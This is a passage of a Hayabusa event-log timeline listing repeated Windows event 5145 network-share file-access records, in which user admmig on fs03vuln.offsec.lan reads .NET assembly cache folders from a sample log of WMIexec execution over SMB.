Windows\assembly | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 